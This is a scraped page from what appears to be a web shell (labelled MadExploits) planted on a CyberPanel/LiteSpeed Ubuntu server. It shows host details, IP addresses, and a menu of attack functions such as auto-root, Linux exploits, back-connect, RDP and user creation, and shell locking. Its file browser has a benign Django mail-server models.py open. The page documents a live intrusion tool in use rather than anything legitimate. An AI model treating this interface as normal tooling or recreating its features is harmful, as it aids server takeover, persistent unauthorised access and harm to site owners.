Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
mailServer /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
migrations
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
__init__.py
0
B
-rw-r--r--
admin.py
89
B
-rw-r--r--
apps.py
121
B
-rw-r--r--
mailserverManager.py
79.2
KB
-rw-r--r--
mailserverManager.py.bak
67.3
KB
-rw-r--r--
models.py
1.68
KB
-rw-r--r--
pluginManager.py
1.9
KB
-rw-r--r--
signals.py
1.53
KB
-rw-r--r--
tests.py
3.2
KB
-rw-r--r--
urls.py
2.07
KB
-rw-r--r--
views.py
7.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : models.py
# This is an auto-generated Django model module. # You'll have to do the following manually to clean this up: # * Rearrange models' order # * Make sure each model has one field with primary_key=True # * Make sure each ForeignKey has `on_delete` set to the desired behavior. # * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table # Feel free to rename the models, but don't rename db_table values or field names. from django.db import models from websiteFunctions.models import Websites, ChildDomains class Domains(models.Model): domainOwner = models.ForeignKey(Websites,on_delete=models.CASCADE, null=True) childOwner = models.ForeignKey(ChildDomains, on_delete=models.CASCADE, null=True) domain = models.CharField(primary_key=True, max_length=50) class Meta: db_table = 'e_domains' class EUsers(models.Model): emailOwner = models.ForeignKey(Domains, on_delete=models.CASCADE) email = models.CharField(primary_key=True, max_length=80) password = models.CharField(max_length=200) mail = models.CharField(max_length=200, default='') DiskUsage = models.CharField(max_length=200, default='0') class Meta: db_table = 'e_users' class Forwardings(models.Model): source = models.CharField(max_length=80) destination = models.TextField() class Meta: db_table = 'e_forwardings' class Transport(models.Model): domain = models.CharField(unique=True, max_length=128) transport = models.CharField(max_length=128) class Meta: db_table = 'e_transport' class Pipeprograms(models.Model): source = models.CharField(max_length=80) destination = models.TextField()
Close